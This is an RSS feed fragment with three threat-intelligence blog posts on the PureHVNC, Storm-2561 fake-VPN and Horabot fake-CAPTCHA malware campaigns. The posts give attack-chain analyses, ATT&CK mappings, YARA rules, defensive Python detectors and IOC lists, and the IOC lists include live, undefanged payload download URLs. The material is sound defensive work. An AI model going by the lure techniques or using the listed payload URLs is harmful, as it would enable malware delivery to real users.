]]></content:encoded></item><item><title><![CDATA[Exploiting Trust: PureHVNC RAT Delivery via Malicious Google Forms]]></title><description><![CDATA[The threat landscape is constantly evolving, with attackers frequently pivoting toward legitimate cloud services to bypass traditional email security filters. Recently, SecLookup identified and tracke]]></description><link>https://blog.seclookup.com/exploiting-trust-purehvnc-rat-delivery-via-malicious-google-forms</link><guid isPermaLink="true">https://blog.seclookup.com/exploiting-trust-purehvnc-rat-delivery-via-malicious-google-forms</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Sat, 21 Mar 2026 05:40:12 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/bd3154b3-eb09-40b5-a71f-9a2daec52479.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The threat landscape is constantly evolving, with attackers frequently pivoting toward legitimate cloud services to bypass traditional email security filters. Recently, SecLookup identified and tracked a sophisticated campaign that leverages Google Forms as a primary delivery mechanism for the PureHVNC Remote Access Trojan (RAT). By masquerading as legitimate recruitment processes, project briefs, and financial documentation, threat actors are successfully compromising corporate endpoints under the guise of professional communication.</p>
<h2>Executive Summary</h2>
<p>The campaign, first identified in early 2026, represents a tactical shift in initial access procedures. Rather than relying on direct email attachments or suspicious landing pages—which are often flagged by Secure Email Gateways (SEGs)—attackers are utilizing Google Forms to host links to malicious payloads. These forms often impersonate well-known brands and are distributed via professional networking platforms like LinkedIn. Once a victim interacts with the form and downloads the linked "project brief" or "job description," a multi-stage infection chain begins, culminating in the deployment of PureHVNC. PureHVNC is a modular .NET-based RAT capable of comprehensive system control, data exfiltration from messaging apps and crypto wallets, and persistent surveillance.</p>
<h2>Threat Analysis: The PureHVNC Infection Chain</h2>
<p>The sophistication of this campaign lies not in the malware itself, but in the social engineering and delivery infrastructure utilized by the threat actors.</p>
<h3>Initial Access and Social Engineering</h3>
<p>Attackers target professionals primarily through LinkedIn, sending direct messages that invite the recipient to review a job opportunity or a project proposal. These messages contain a link to a Google Form. Because Google is a trusted domain, these links frequently bypass automated security checks and do not trigger the same level of suspicion as a direct link to a ZIP file or an unknown domain.</p>
<p>The Google Forms are meticulously crafted, featuring:</p>
<ul>
<li><p>Stolen corporate logos and branding.</p>
</li>
<li><p>Professional language consistent with HR or project management roles.</p>
</li>
<li><p>Requests for the victim’s professional background to add a layer of perceived legitimacy.</p>
</li>
<li><p>A "Download Brief" or "Document Link" section that redirects to external file-sharing services.</p>
</li>
</ul>
<h3>Delivery and Execution</h3>
<p>The Google Forms link to malicious archives hosted on platforms like Dropbox or <code>fshare.vn</code>, often obscured by URL shorteners such as <code>goo.su</code>. The downloaded ZIP file typically contains a heavily obfuscated loader or a malicious shortcut (LNK) file whose name and icon are chosen to make it look like a PDF or Word document.</p>
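<p>As an added example (not SecLookup's tooling and not code from the Malwarebytes report), the following Python check inspects every member of a downloaded archive before a user opens it. It flags shortcut files dressed up as documents in two ways: a double extension such as <code>.pdf.lnk</code>, and a document extension sitting on top of Shell Link (LNK) header bytes, which is the on-disk signature of a Windows shortcut. The archive, its file names and the simplified layout are constructed for the example; the document extension list and the per-finding reasons are this example's own choices.</p>

```python
"""Flag archive members that look like documents but are Windows shortcuts.

Added example, not SecLookup's or the campaign report's code. A mail or
download gateway can run this over a ZIP before the user extracts it.
"""
import io
import zipfile

# A Shell Link file starts with HeaderSize 0x4C (little-endian) followed by
# the LinkCLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order.
LNK_HEADER = bytes.fromhex("4c000000" "01140200" "00000000" "c000000000000046")

# Extensions a recruitment or "project brief" lure would claim to be.
# Chosen for this example; extend to whatever your users expect to receive.
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")


def inspect_member(name, head):
    """Return the reasons one archive member is suspicious (empty list if none).

    name: member path inside the archive; head: its first bytes (20 is enough).
    """
    reasons = []
    base = name.lower().rsplit("/", 1)[-1]
    if base.endswith(".lnk"):
        reasons.append("shortcut (.lnk) inside a downloaded archive")
        if base[:-4].endswith(DOCUMENT_EXTS):
            reasons.append("double extension disguises the shortcut as a document")
    if head.startswith(LNK_HEADER) and not base.endswith(".lnk"):
        reasons.append("content is a Shell Link but the name claims another type")
    return reasons


def inspect_archive(zip_bytes):
    """Map each suspicious member name to its reasons; a clean archive gives {}."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Only the header bytes are needed, so avoid reading whole members.
            head = zf.open(info).read(len(LNK_HEADER))
            reasons = inspect_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_archive():
    """Constructed lure archive mirroring the delivery described above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # Shortcut named to read as a PDF in Explorer (extension hidden).
        zf.writestr("Project Brief/Overview.pdf.lnk", LNK_HEADER + b"\x00" * 64)
        # Name says Word document, bytes say Shell Link: a tampering signal.
        zf.writestr("Project Brief/Job Description.docx", LNK_HEADER + b"\x00" * 64)
        # Benign text file, should not be flagged.
        zf.writestr("Project Brief/README.txt", b"Please review the attached brief.\n")
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in inspect_archive(build_sample_archive()).items():
        print(member, "->", "; ".join(why))
```

<p>A member that merely has a <code>.lnk</code> extension is reported on its own, since a shortcut has no business in a recruitment archive, while the header check catches renamed shortcuts that a name-only filter would miss.</p>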
<p>Upon execution, the loader initiates a multi-stage process:</p>
<ol>
<li><p><strong>De-obfuscation:</strong> The primary loader decrypts the next stage of the payload in memory to avoid signature-based detection.</p>
</li>
<li><p><strong>Environment Checking:</strong> The malware checks for the presence of virtual machines, sandboxes, or specific security software.</p>
</li>
<li><p><strong>Payload Injection:</strong> The final PureHVNC payload is injected into a legitimate system process (Process Hollowing).</p>
</li>
</ol>
<h3>PureHVNC Capabilities</h3>
<p>PureHVNC belongs to the "Pure" family of malware, known for its modularity and effectiveness. As a Remote Access Trojan, it provides the operator with a "Hidden Virtual Network Computing" (HVNC) capability, allowing them to control the victim's desktop without the user's knowledge.</p>
<p>Key functionalities include:</p>
<ul>
<li><p><strong>Data Theft:</strong> Targeted extraction of data from browsers (passwords, cookies), browser extensions (authenticator apps), and cryptocurrency wallets.</p>
</li>
<li><p><strong>Application Monitoring:</strong> Specific modules for stealing data from Telegram and Foxmail.</p>
</li>
<li><p><strong>System Profiling:</strong> Collection of OS details, hardware specifications, and information on connected network devices.</p>
</li>
<li><p><strong>Remote Command Execution:</strong> A full-featured shell for executing arbitrary commands or PowerShell scripts.</p>
</li>
<li><p><strong>Modular Architecture:</strong> The ability to download and execute additional plugins based on the value of the infected host.</p>
</li>
</ul>
<h2>MITRE ATT&amp;CK Mapping</h2>
<p>The TTPs observed in this campaign align with the following MITRE ATT&amp;CK techniques:</p>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique ID</th>
<th>Technique Name</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Initial Access</strong></td>
<td>T1566.002</td>
<td>Phishing: Spearphishing Link</td>
</tr>
<tr>
<td><strong>Execution</strong></td>
<td>T1204.002</td>
<td>User Execution: Malicious File</td>
</tr>
<tr>
<td><strong>Persistence</strong></td>
<td>T1053.005</td>
<td>Scheduled Task/Job: Scheduled Task</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>T1027</td>
<td>Obfuscated Files or Information</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>T1055</td>
<td>Process Injection</td>
</tr>
<tr>
<td><strong>Credential Access</strong></td>
<td>T1555</td>
<td>Credentials from Password Stores</td>
</tr>
<tr>
<td><strong>Discovery</strong></td>
<td>T1082</td>
<td>System Information Discovery</td>
</tr>
<tr>
<td><strong>Collection</strong></td>
<td>T1560</td>
<td>Archive Collected Data</td>
</tr>
<tr>
<td><strong>Command &amp; Control</strong></td>
<td>T1071.001</td>
<td>Application Layer Protocol: Web Protocols</td>
</tr>
</tbody></table>
<h2>SecLookup Detection</h2>
<p>At SecLookup, our threat intelligence platform has been actively monitoring the infrastructure associated with this campaign. We are pleased to confirm that SecLookup was actively detecting and blocking the domains <code>goo.su</code>, <code>fshare.vn</code>, and the specific URL structures used in these Google Form lures prior to the widespread public disclosure of the campaign.</p>
<p>Our proactive scanning identified the malicious nature of these file-sharing links and the underlying IP address (<code>207.148.66.14</code>) associated with the PureHVNC C2 infrastructure. Customers utilizing SecLookup’s API integrations and threat feeds were protected from these initial access attempts via automated DNS and URL filtering.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Confirmed Malicious Domains</h3>
<pre><code class="language-text">goo.su
fshare.vn
www.fshare.vn
</code></pre>
<h3>IP Addresses</h3>
<pre><code class="language-text">207.148.66.14
</code></pre>
<h3>File Hashes (SHA-256)</h3>
<pre><code class="language-text">b78514cfd0ba49d3181033d78cb7b7bc54b958f242a4ebcd0a5b39269bdc8357
</code></pre>
<h3>URLs</h3>
<pre><code class="language-text">https://tr..ee/R9y0SK
https://www.fshare.vn/file/F57BN4BZPC8W
https://dl.dropbox.com/scl/fi/52sgtk50j285hmde2ycry/Overview-of-the-MSI-Accounting-Project.rar?rlkey=9qmunvcp8oleeycld08gqwup9
https://goo.su/CmLknt7
</code></pre>
<h2>Detection Rules</h2>
<h3>YARA Rules</h3>
<p>The following YARA rules can be used to scan for PureHVNC binaries and campaign-specific markers within your environment.</p>
<pre><code class="language-yara">rule Malware_PureHVNC_Generic {
    meta:
        description = "Detects generic PureHVNC RAT identifiers and capabilities based on campaign report"
        author = "SecLookup Threat Intelligence"
        date = "2024-05-22"
    strings:
        $name1 = "PureHVNC" ascii wide
        $name2 = "PureLogs" ascii wide
        $cap1 = "Foxmail" ascii wide
        $cap2 = "Telegram" ascii wide
        $cap3 = "crypto" ascii wide
        $cap4 = "wallet" ascii wide
        $net = "MSIL" ascii
    condition:
        // PE header, then either a family name string or the full capability set in a .NET (MSIL) binary
        uint16(0) == 0x5A4D and (any of ($name*) or (all of ($cap*) and $net))
}

rule PureHVNC_Campaign_Indicators {
    meta:
        description = "Detects indicators related to the PureHVNC delivery campaign via Google Forms and file sharing sites"
        author = "SecLookup Threat Intelligence"
        date = "2024-05-22"
    strings:
        $url1 = "goo.su" ascii wide
        $url2 = "fshare.vn" ascii wide
        $lure1 = "job interview" ascii wide nocase
        $lure2 = "project brief" ascii wide nocase
        $lure3 = "financial document" ascii wide nocase
    condition:
        // A delivery domain together with at least one lure phrase
        any of ($url*) and any of ($lure*)
}
</code></pre>
<h2>Recommendations</h2>
<p>To defend against this and similar campaigns, SecLookup recommends the following actions:</p>
<ol>
<li><p><strong>Enhance Web Filtering:</strong> Implement strict URL filtering to block known malicious domains and common URL shorteners used in malware delivery (e.g., <code>goo.su</code>). Restrict access to personal file-sharing sites (e.g., <code>fshare.vn</code>) from corporate networks unless there is a verified business need.</p>
</li>
<li><p><strong>User Awareness Training:</strong> Educate employees on the dangers of clicking links within unsolicited LinkedIn messages or Google Forms. Emphasize that legitimate recruitment processes rarely require downloading ZIP files from third-party file-sharing sites.</p>
</li>
<li><p><strong>Monitor for Persistence:</strong> Use EDR (Endpoint Detection and Response) tools to monitor for the creation of unusual scheduled tasks or registry keys, which are common persistence mechanisms for PureHVNC.</p>
</li>
<li><p><strong>Process Monitoring:</strong> Monitor for process hollowing or injection into common Windows binaries (e.g., <code>svchost.exe</code>, <code>explorer.exe</code>).</p>
</li>
<li><p><strong>Audit Crypto-Assets:</strong> For organizations handling cryptocurrency, ensure that wallets are protected with hardware-based keys and that browser-based wallet extensions are strictly audited.</p>
</li>
</ol>
<h2>References</h2>
<ul>
<li><a href="https://www.malwarebytes.com/blog/threat-intel/2026/03/that-job-brief-on-google-forms-could-infect-your-device">That “job brief” on Google Forms could infect your device</a> by Malwarebytes Labs</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Storm-2561 Uses SEO Poisoning to Distribute Fake VPN Clients for Credential Theft]]></title><description><![CDATA[Executive Summary
In a sophisticated campaign targeting enterprise environments, the threat actor Storm-2561 has resumed operations by leveraging Search Engine Optimization (SEO) poisoning to distribu]]></description><link>https://blog.seclookup.com/storm-2561-uses-seo-poisoning-to-distribute-fake-vpn-clients-for-credential-theft</link><guid isPermaLink="true">https://blog.seclookup.com/storm-2561-uses-seo-poisoning-to-distribute-fake-vpn-clients-for-credential-theft</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Fri, 20 Mar 2026 05:54:37 GMT</pubDate><enclosure url="https://images.unsplash.com/photo-1603985529862-9e12198c9a60?ixid=M3wyNjEwMzZ8MHwxfHNlYXJjaHwxfHx2cG58ZW58MHwwfHx8MTc3Mzk4NjAyM3ww&amp;ixlib=rb-4.1.0&amp;w=1600&amp;q=80" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>In a sophisticated campaign targeting enterprise environments, the threat actor Storm-2561 has resumed operations by leveraging Search Engine Optimization (SEO) poisoning to distribute malicious VPN clients. Active since May 2025, this cybercriminal group has refined its tactics to bypass user skepticism and detection mechanisms. By manipulating search engine rankings to redirect users searching for legitimate enterprise software to malicious ZIP files, Storm-2561 deploys digitally signed trojans that masquerade as trusted VPN clients. These malicious payloads are designed to harvest VPN credentials, posing a significant risk to organizations relying on remote access solutions. As security professionals, it is critical to understand the attack chain, the specific infrastructure utilized, and how SecLookup is actively mitigating this threat.</p>
<h2>Threat Analysis</h2>
<p>The Storm-2561 attack chain represents a blend of social engineering and supply chain compromise. Unlike generic phishing attempts, this campaign targets users with high intent—individuals actively searching for specific enterprise VPN solutions. This intent reduces the user's hesitation to download and execute software, creating a high-success-rate vector for credential theft.</p>
<h3>TTPs and Attack Chain</h3>
<p>The campaign begins with <strong>SEO Poisoning (T1566.001 - Spearphishing Link)</strong>. Attackers register domains that closely resemble legitimate software vendors, utilizing slight misspellings or geographic suffixes (e.g., <code>forticlient-vpn.de</code> instead of <code>forticlient.de</code>). When users search for standard enterprise software, these malicious domains often rank higher in search results than the legitimate vendor sites.</p>
<p>Once a user clicks the malicious link, they are directed to a landing page hosting a malicious ZIP file. According to the Microsoft Threat Intelligence report, these files are hosted on GitHub repositories (which have since been taken down) and attacker-controlled websites.</p>
<p>The critical phase of this attack involves <strong>Code Signing Abuse (T1546.004)</strong>. The extracted installer is a trojan that is digitally signed. While the attacker used a legitimate certificate, it has since been revoked. This digital signature is intended to bypass standard operating system warnings and heuristic antivirus engines, which often flag unsigned executables as suspicious. By leveraging a trusted signature, the malware gains a "halo effect," making it appear legitimate to the user and the system's security stack.</p>
<h3>Technical Implementation</h3>
<p>The malware payload, once executed, behaves exactly like a standard VPN client. However, instead of establishing a secure tunnel, it captures the user's credentials—typically usernames and passwords—and exfiltrates them to a C2 (Command and Control) server. This technique is particularly dangerous because it targets users who are actively trying to access their corporate networks, making them vulnerable to credential harvesting during a time of high urgency.</p>
<h3>MITRE ATT&amp;CK Mapping</h3>
<ul>
<li><p><strong>T1566.001:</strong> Spearphishing Link: Attackers manipulate search results to deliver malicious payloads.</p>
</li>
<li><p><strong>T1195:</strong> Supply Chain Compromise: The distribution mechanism involves exploiting the trust associated with software vendors.</p>
</li>
<li><p><strong>T1546.004:</strong> Event Triggered Execution via Code Signing: The malware utilizes a revoked certificate to evade detection and gain execution privileges.</p>
</li>
</ul>
<h2>Indicators of Compromise (IOCs)</h2>
<p>SecLookup's threat intelligence platform has analyzed the infrastructure associated with this Storm-2561 campaign. We have identified numerous malicious domains, files, and infrastructure elements designed to facilitate this credential theft campaign. All of the following IOCs have been confirmed malicious.</p>
<h3>Malicious Domains</h3>
<pre><code class="language-text">cisco-secure-client.es
forticlient-vpn.de
sophos-connect.org
myconnection.pro
sonicwall-netextender.nl
pn-connection.pro
forticlient-vpn.it
ivanti-vpn.org
forticlient.co.uk
forticlient-vpn.fr
forticlient.ca
ivanti-secure-access.de
</code></pre>
<h3>IP Addresses</h3>
<pre><code class="language-text">194.76.226.93
</code></pre>
<h3>File Hashes (SHA-256)</h3>
<pre><code class="language-text">862f004679d3b142d9d2c729e78df716aeeda0c7a87a11324742a5a8eda9b557
</code></pre>
<h3>URLs</h3>
<pre><code class="language-text">https://github.com/latestver/vpn/releases/download/vpn-client2/VPN-CLIENT.zip
</code></pre>
<h2>SecLookup Detection</h2>
<p>SecLookup is actively monitoring the threat landscape and has integrated these IOCs into our threat intelligence platform. We have successfully detected and blocked the following malicious domains (<code>cisco-secure-client.es</code>, <code>forticlient-vpn.de</code>, <code>sophos-connect.org</code>, <code>myconnection.pro</code>, <code>sonicwall-netextender.nl</code>, <code>pn-connection.pro</code>, <code>forticlient-vpn.it</code>, <code>ivanti-vpn.org</code>, <code>forticlient.co.uk</code>, <code>forticlient-vpn.fr</code>, <code>forticlient.ca</code>, <code>ivanti-secure-access.de</code>) and their associated file hashes to protect our users from this credential theft campaign. Our systems are configured to prevent connections to these IPs and block the execution of the identified malicious binaries.</p>
<h2>Recommendations</h2>
<p>To defend against the Storm-2561 campaign and similar SEO poisoning attacks, we recommend the following security measures:</p>
<ol>
<li><p><strong>Verify Official Sources:</strong> Always verify software downloads through official vendor websites. If you cannot find the software on the official vendor's site, do not download it from search results.</p>
</li>
<li><p><strong>Check Certificate Revocation:</strong> Even if an executable is digitally signed, verify that the certificate is not revoked. You can do this using tools like <code>certutil -verify</code> or by checking the certificate chain in your endpoint protection software.</p>
</li>
<li><p><strong>Monitor Network Traffic:</strong> Use network monitoring tools to detect connections to domains that closely resemble legitimate software vendors but are not on your allowlist.</p>
</li>
<li><p><strong>Enable Phishing-Resistant MFA:</strong> Ensure that Multi-Factor Authentication (MFA) is enforced for VPN access. If credentials are stolen, MFA adds a critical layer of defense, preventing unauthorized access even if the user's password is compromised.</p>
</li>
<li><p><strong>Endpoint Detection and Response (EDR):</strong> Ensure your EDR solution is configured to detect and block the execution of unsigned or suspicious binaries, and monitor for credential dumping activities.</p>
</li>
</ol>
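<p>The lookalike pattern described in the TTPs section (a vendor product name with a different suffix or spelling, such as <code>forticlient-vpn.de</code>) and the "Monitor Network Traffic" recommendation above can be turned into a simple DNS-log check. The following Python is an added example, not SecLookup's or Microsoft's code: it reduces each queried host to its registrable domain, looks for a vendor token inside that domain, and reports any that is not on an explicit allowlist. The log format, the vendor token list, the allowlist and the short public-suffix table are constructed for the example; a production version would use the Public Suffix List for the registrable-domain split.</p>

```python
"""Flag DNS queries for vendor-lookalike domains that are not allowlisted.

Added example, not SecLookup's or Microsoft's code. The campaign's own IOC
domains are used as sample queries alongside legitimate vendor hosts.
"""
import re

# Product or vendor tokens whose presence in a registrable domain deserves a look.
# Constructed for this example; extend with the vendors your estate actually uses.
VENDOR_TOKENS = ("forticlient", "fortinet", "ivanti", "sonicwall", "netextender",
                 "sophos", "cisco", "anyconnect")

# Domains the organisation legitimately resolves (constructed allowlist).
ALLOWED_DOMAINS = {"fortinet.com", "ivanti.com", "sonicwall.com", "sophos.com", "cisco.com"}

# Minimal stand-in for the Public Suffix List so "forticlient.co.uk" splits correctly.
TWO_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp", "com.br"}


def registrable_domain(host):
    """Return the registrable part of a hostname, e.g. www.fortinet.com -> fortinet.com."""
    labels = host.lower().strip(".").split(".")
    if len(labels) == 1 and labels[0] == "":
        return ""
    if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES and len(labels) >= 3:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def lookalike_hits(host):
    """Return the vendor tokens found in host's registrable domain; [] if allowed or clean."""
    rd = registrable_domain(host)
    if rd == "" or rd in ALLOWED_DOMAINS:
        return []
    label = rd.split(".")[0]                       # "forticlient-vpn" from forticlient-vpn.de
    compact = label.replace("-", "").replace("_", "")
    return [t for t in VENDOR_TOKENS if t in compact]


# Constructed DNS log lines: "timestamp client query host type".
SAMPLE_DNS_LOG = """\
2026-03-12T09:14:02Z 10.20.1.15 query forticlient-vpn.de A
2026-03-12T09:14:05Z 10.20.1.15 query www.fortinet.com A
2026-03-12T09:15:11Z 10.20.1.22 query ivanti-secure-access.de A
2026-03-12T09:15:30Z 10.20.1.22 query forticlient.co.uk A
2026-03-12T09:16:00Z 10.20.1.40 query updates.sophos.com A
2026-03-12T09:16:45Z 10.20.1.40 query sonicwall-netextender.nl A
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+query\s+(\S+)\s+\S+$")


def scan_dns_log(text):
    """Return (client, host, tokens) for every query whose domain is a lookalike."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _, client, host = m.groups()
        tokens = lookalike_hits(host)
        if tokens:
            alerts.append((client, host, tokens))
    return alerts


if __name__ == "__main__":
    for client, host, tokens in scan_dns_log(SAMPLE_DNS_LOG):
        print(client, host, tokens)
```

<p>The allowlist is checked on the registrable domain, so <code>updates.sophos.com</code> passes while <code>sophos-connect.org</code> would not; hyphens are stripped before matching so that <code>cisco-secure-client.es</code> still hits the <code>cisco</code> token.</p>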
<h2>References</h2>
<ul>
<li><a href="https://www.microsoft.com/en-us/security/blog/2026/03/12/storm-2561-uses-seo-poisoning-to-distribute-fake-vpn-clients-for-credential-theft/">Storm-2561 uses SEO poisoning to distribute fake VPN clients for credential theft</a> by Microsoft Threat Intelligence and Microsoft Defender Experts, Microsoft Security Blog</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Unpacking the "Sapecar" Campaign: Technical Analysis of the Horabot Banking Trojan in Mexico]]></title><description><![CDATA[The threat landscape in Latin America continues to evolve with increasing complexity, as evidenced by a recent surge in activity surrounding Horabot. This multi-stage threat bundle—comprising a modula]]></description><link>https://blog.seclookup.com/unpacking-the-sapecar-campaign-technical-analysis-of-the-horabot-banking-trojan-in-mexico</link><guid isPermaLink="true">https://blog.seclookup.com/unpacking-the-sapecar-campaign-technical-analysis-of-the-horabot-banking-trojan-in-mexico</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Thu, 19 Mar 2026 19:31:29 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/beab317b-4353-4e2e-9039-797955dd09a9.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The threat landscape in Latin America continues to evolve with increasing complexity, as evidenced by a recent surge in activity surrounding <strong>Horabot</strong>. This multi-stage threat bundle—comprising a modular banking Trojan and an automated email spreader—has recently been observed targeting users in Mexico through a sophisticated "Sapecar" campaign.</p>
<p>At SecLookup, our mission is to provide proactive intelligence against emerging threats. Our threat intelligence platform was actively detecting and blocking the infrastructure associated with this campaign well before its public disclosure, ensuring our users remained protected against these deceptive tactics. In this post, we will break down the technical nuances of the attack chain, the threat actor's tactics, and the specific indicators identified during our analysis.</p>
<h2>Executive Summary</h2>
<p>The Horabot campaign, dubbed "Sapecar" by researchers at Kaspersky GReAT, represents a significant evolution in social engineering-based malware delivery. The campaign primarily targets Mexican financial institutions and their customers. The attack utilizes a deceptive "Fake CAPTCHA" lure that tricks users into executing malicious commands manually via the Windows Run dialog—a technique increasingly favored by modern stealers and bankers to bypass traditional browser-based security controls. Once executed, the infection chain deploys a PowerShell-based downloader that eventually leads to the installation of Horabot, a Trojan capable of stealing sensitive financial data and turning the victim's machine into a distribution node for further phishing campaigns.</p>
<h2>Threat Analysis: The "Sapecar" Kill Chain</h2>
<p>The Horabot attack chain is a masterclass in Living-off-the-Land (LotL) techniques combined with psychological manipulation. By leveraging legitimate Windows utilities, the adversary minimizes their file-based footprint and avoids triggering basic signature-based detection.</p>
<h3>Stage 1: Social Engineering and the Fake CAPTCHA</h3>
<p>The attack begins with a phishing email or a malicious redirection to a landing page designed to mimic a standard security verification screen. These pages are often hosted on newly registered domains such as <code>evs.grupotuis[.]buzz</code>.</p>
<p>Unlike traditional drive-by downloads, this campaign utilizes a "manual execution" lure. The page displays a fake CAPTCHA and instructs the user to:</p>
<ol>
<li><p>Press <code>Win + R</code> to open the Windows Run dialog.</p>
</li>
<li><p>Paste a pre-copied malicious command (already in the user's clipboard via JavaScript).</p>
</li>
<li><p>Press Enter.</p>
</li>
</ol>
<p>This tactic effectively bypasses many web-filtering and sandbox solutions because the malicious action is initiated by the user through a legitimate system component, rather than being directly downloaded or executed by the browser.</p>
<h3>Stage 2: Execution via MSHTA and PowerShell</h3>
<p>The command pasted into the Run dialog typically invokes <code>mshta.exe</code>, a legitimate Windows utility used to execute Microsoft HTML Applications (HTAs). The command points to a remote URL, such as <code>https://evs.grupotuis[.]buzz/0capcha17/</code>, which serves a malicious script.</p>
<p>This script initiates a PowerShell sequence that performs environment checks, establishes persistence, and downloads the next stage of the malware. The use of <code>mshta.exe</code> is a classic MITRE ATT&amp;CK technique (<strong>T1218.005</strong>) used to proxy the execution of malicious code through a trusted binary.</p>
<h3>Stage 3: The Horabot Payload</h3>
<p>The final payload is a sophisticated banking Trojan designed specifically for the Mexican market. Its primary capabilities include:</p>
<ul>
<li><p><strong>Credential Harvesting:</strong> Intercepting login credentials for online banking portals.</p>
</li>
<li><p><strong>Form Grabbing:</strong> Capturing data entered into web forms.</p>
</li>
<li><p><strong>Email Spreading:</strong> Accessing the victim's Outlook or webmail to send out further phishing lures to contacts, facilitating lateral movement across organizations and social circles.</p>
</li>
<li><p><strong>Remote Access:</strong> Providing the attacker with a backdoor to the infected system.</p>
</li>
</ul>
<p>The "Sapecar" campaign is notable for its use of diverse infrastructure, including domains like <code>aufal.filevexcasv[.]buzz</code> and <code>cgf.midasx[.]site</code>, which were used for command-and-control (C2) and payload delivery.</p>
<h2>MITRE ATT&amp;CK Mapping</h2>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique</th>
<th>ID</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Initial Access</strong></td>
<td>Phishing: Malicious Link</td>
<td>T1566.002</td>
</tr>
<tr>
<td><strong>Execution</strong></td>
<td>User Execution: Malicious Link</td>
<td>T1204.001</td>
</tr>
<tr>
<td><strong>Execution</strong></td>
<td>Signed Binary Proxy Execution: Mshta</td>
<td>T1218.005</td>
</tr>
<tr>
<td><strong>Execution</strong></td>
<td>Command and Scripting Interpreter: PowerShell</td>
<td>T1059.001</td>
</tr>
<tr>
<td><strong>Persistence</strong></td>
<td>Boot or Logon Autostart Execution: Registry Run Keys</td>
<td>T1547.001</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>Obfuscated Files or Information</td>
<td>T1027</td>
</tr>
<tr>
<td><strong>Exfiltration</strong></td>
<td>Exfiltration Over C2 Channel</td>
<td>T1041</td>
</tr>
</tbody></table>
<h2>SecLookup Detection</h2>
<p>The SecLookup threat intelligence platform proactively identified the infrastructure used in this Horabot campaign. Our systems flagged the following domains as malicious based on their registration patterns, hosting providers, and association with known malware distribution scripts:</p>
<ul>
<li><p><code>aufal.filevexcasv[.]buzz</code></p>
</li>
<li><p><code>cgf.midasx[.]site</code></p>
</li>
<li><p><code>thea.gruposhac[.]space</code></p>
</li>
<li><p><code>labodeguitaup[.]space</code></p>
</li>
<li><p><code>cfg.brasilinst[.]site</code></p>
</li>
<li><p><code>lifenews[.]pro</code></p>
</li>
</ul>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Malicious Domains</h3>
<pre><code class="language-text">aufal.filevexcasv.buzz
cgf.midasx.site
thea.gruposhac.space
labodeguitaup.space
cfg.brasilinst.site
lifenews.pro
grupotuis.buzz
midasx.site
gruposhac.lat
facturastbs.shop
brasilinst.site
</code></pre>
<h3>IP Addresses</h3>
<pre><code class="language-text">64.177.80.44
</code></pre>
<h3>File Hashes (MD5)</h3>
<pre><code class="language-text">c882d948d44a65019df54b0b2996677f
6272ef6ac1de8fb4bdd4a760be7ba5ed
4caa797130b5f7116f11c0b48013e430
</code></pre>
<h3>Malicious URLs</h3>
<pre><code class="language-text">https://evs.grupotuis.buzz/0capcha17/DMEENLIGGB/GRXUOIWCEKVX
https://thea.gruposhac.space/0out0408
https://cgf.facturastbs.shop/0725/a/home
https://cfg.brasilinst.site/a/br/logs/index.php?CHLG
https://aufal.filevexcasv.buzz/on7all/index15.php
https://pdj.gruposhac.lat/g1/gerador.php
https://pdj.gruposhac.lat/g1/
https://pdj.gruposhac.lat/g1/auxld1
https://upstar.pics/a/08/150822/up/up
https://labodeguitaup.space/a/08/150822/au/au
</code></pre>
<h2>Recommendations</h2>
<p>To defend against Horabot and similar social engineering-led campaigns, SecLookup recommends the following actions:</p>
<ol>
<li><p><strong>Block LOLBAS Execution:</strong> Restrict the execution of <code>mshta.exe</code>, <code>powershell.exe</code>, and <code>cmd.exe</code> for standard users where not operationally required. Monitor for <code>mshta.exe</code> making external network connections.</p>
</li>
<li><p><strong>User Awareness Training:</strong> Educate employees on the dangers of the Windows Run dialog (<code>Win+R</code>). Emphasize that legitimate websites—especially security verification pages—will never ask a user to paste commands into the Run dialog.</p>
</li>
<li><p><strong>Endpoint Monitoring:</strong> Deploy EDR solutions to alert on suspicious parent-child process relationships, such as a web browser or the Run dialog launching <code>mshta.exe</code>.</p>
</li>
<li><p><strong>Implement DNS Filtering:</strong> Use a threat intelligence-driven DNS filtering service to block access to known malicious domains like those identified in the Horabot infrastructure.</p>
</li>
